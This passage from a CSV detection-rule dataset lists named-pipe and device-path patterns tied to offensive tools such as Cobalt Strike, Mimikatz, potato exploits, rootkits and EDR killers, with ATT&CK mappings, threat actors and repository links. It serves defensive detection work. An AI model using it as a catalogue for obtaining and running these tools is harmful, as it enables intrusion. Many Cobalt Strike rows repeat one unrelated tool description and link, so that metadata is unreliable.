menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13594"
"*\\.\pipe\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*",".{0,1000}\\\\\.\\pipe\\PIPEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13596"
"*\\.\pipe\portscan*",".{0,1000}\\\\\.\\pipe\\portscan.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13597"
"*\\.\pipe\PrivFu*",".{0,1000}\\\\\.\\pipe\\PrivFu.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#namedpipe","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","13598"
"*\\.\pipe\pwned/pipe/srvsvc*",".{0,1000}\\\\\.\\pipe\\pwned\/pipe\/srvsvc.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","#namedpipe","N/A","10","6","518","92","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z","13599"
"*\\.\pipe\RemoteMaint*",".{0,1000}\\\\\.\\pipe\\RemoteMaint.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#namedpipe","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","13600"
"*\\.\pipe\screenshot*",".{0,1000}\\\\\.\\pipe\\screenshot.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13601"
"*\\.\pipe\sshagent*",".{0,1000}\\\\\.\\pipe\\sshagent.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13602"
"*\\.\pipe\test\pipe\spoolss *",".{0,1000}\\\\\.\\pipe\\test\\pipe\\spoolss\s.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#namedpipe","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","13605"
"*\\.\pipe\WinPwnagePipe*",".{0,1000}\\\\\.\\pipe\\WinPwnagePipe.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#namedpipe","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","13606"
"*\\.\pipe\win-sux-no-async-anon-pipe-*-*",".{0,1000}\\\\\.\\pipe\\win\-sux\-no\-async\-anon\-pipe\-.{0,1000}\-.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#namedpipe","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","13607"
"*\\.\pipe\wzcsvc_wep_keys*",".{0,1000}\\\\\.\\pipe\\wzcsvc_wep_keys.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#namedpipe","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13608"
"*\\.pipe\imposingcost*",".{0,1000}\\\\\.pipe\\imposingcost.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#namedpipe","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","13609"
"*\\:C*",".{0,1000}\\\\\:C.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed c:\\","T1021 - T1024 - T1027 - T1035 - T1059 - T1070","TA0001 - TA0002 - TA0003 - TA0005 - TA0006","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","13610"
"*\\??\\Jormungandr*",".{0,1000}\\\\\?\?\\\\Jormungandr.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","0","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","13611"
"*\\??\\Nidhogg*",".{0,1000}\\\\\?\?\\\\Nidhogg.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","13612"
"*\\\\*\\*\\Get-FileLockProcess.ps1*",".{0,1000}\\\\\\\\.{0,1000}\\\\.{0,1000}\\\\Get\-FileLockProcess\.ps1.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","MuddyWater - Dispossessor","Discovery","https://github.com/ShawnDEvans/smbmap","1","0","N/A","N/A","10","10","1890","359","2025-02-28T18:09:10Z","2015-03-16T13:15:00Z","13613"
"*\\\\*\\share\\test.bin*",".{0,1000}\\\\\\\\.{0,1000}\\\\share\\\\test\.bin.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","N/A","10","8","700","83","2025-01-26T08:05:48Z","2023-04-05T09:39:33Z","13614"
"*\\\\.\\*\\*\\*\\smile.txt\*",".{0,1000}\\\\\\\\\.\\\\.{0,1000}\\\\.{0,1000}\\\\.{0,1000}\\\\smile\.txt\\.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","13615"
"*\\\\.\\aswSP_Avar*",".{0,1000}\\\\\\\\\.\\\\aswSP_Avar.{0,1000}","offensive_tool_keyword","BYOVD_kill_av_edr","BYOD to kill AV/EDR","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/red-team-scripts/blob/main/BYOVD_kill_av_edr.c","1","0","N/A","N/A","10","3","299","55","2024-08-08T06:11:06Z","2023-01-15T22:37:34Z","13621"
"*\\\\.\\Cronos*",".{0,1000}\\\\\\\\\.\\\\Cronos.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","0","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","13623"
"*\\\\.\\pipe\\"" MIMIKATZ*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\\""\sMIMIKATZ.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#content #namedpipe","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","13624"
"*\\\\.\\pipe\\$77childproc64*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\\$77childproc64.{0,1000}","offensive_tool_keyword","r77-rootkit","Fileless ring 3 rootkit with installer and persistence that hides processes, files, network connections","T1014 - T1055 - T1055.013 - T1060 - T1106 - T1070.009","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/bytecode77/r77-rootkit","1","0","#namedpipe","N/A","10","10","1884","425","2025-03-25T17:59:20Z","2017-12-17T13:04:14Z","13625"
"*\\\\.\\pipe\\bypassuac*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\bypassuac.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13626"
"*\\\\.\\pipe\\coerced\\pipe\\spoolss*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\spoolss.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#namedpipe","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","13627"
"*\\\\.\\pipe\\coerced\\pipe\\srvsvc*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\coerced\\\\pipe\\\\srvsvc.{0,1000}","offensive_tool_keyword","CoercedPotato","CoercedPotato From Patate (LOCAL/NETWORK SERVICE) to SYSTEM by abusing SeImpersonatePrivilege on Windows 10 Windows 11 and Server 2022.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Prepouce/CoercedPotato","1","0","#namedpipe","N/A","10","4","366","66","2024-08-26T08:09:00Z","2023-09-11T19:04:29Z","13628"
"*\\\\.\\pipe\\EasySystem*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\EasySystem.{0,1000}","offensive_tool_keyword","p0wnedShell","p0wnedShell is an offensive PowerShell host application written in C# that does not rely on powershell.exe but runs powershell commands and functions within a powershell runspace environment (.NET). It has a lot of offensive PowerShell modules and binaries included to make the process of Post Exploitation easier. What we tried was to build an ?all in one? Post Exploitation tool which we could use to bypass all mitigations solutions (or at least some off). and that has all relevant tooling included. You can use it to perform modern attacks within Active Directory environments and create awareness within your Blue team so they can build the right defense strategies.","T1086 - T1059 - T1106 - T1566","TA0002 - TA0003 - TA0007","N/A","N/A","Defense Evasion","https://github.com/Cn33liz/p0wnedShell","1","0","#namedpipe","N/A","9","10","1535","335","2019-08-02T16:24:39Z","2015-12-25T11:44:37Z","13629"
"*\\\\.\\pipe\\ElevationPipe*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ElevationPipe.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#namedpipe","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","13630"
"*\\\\.\\pipe\\hashdump*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\hashdump.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","#namedpipe","N/A","10","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","13631"
"*\\\\.\\pipe\\innocent*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\innocent.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#namedpipe","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","13632"
"*\\\\.\\pipe\\ioring_in*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_in.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#namedpipe","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","13633"
"*\\\\.\\pipe\\ioring_out*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\ioring_out.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","#namedpipe","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","13634"
"*\\\\.\\pipe\\keylogger*",".{0,1000}\\\\\\\\\.\\\\pipe\\\\keylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - 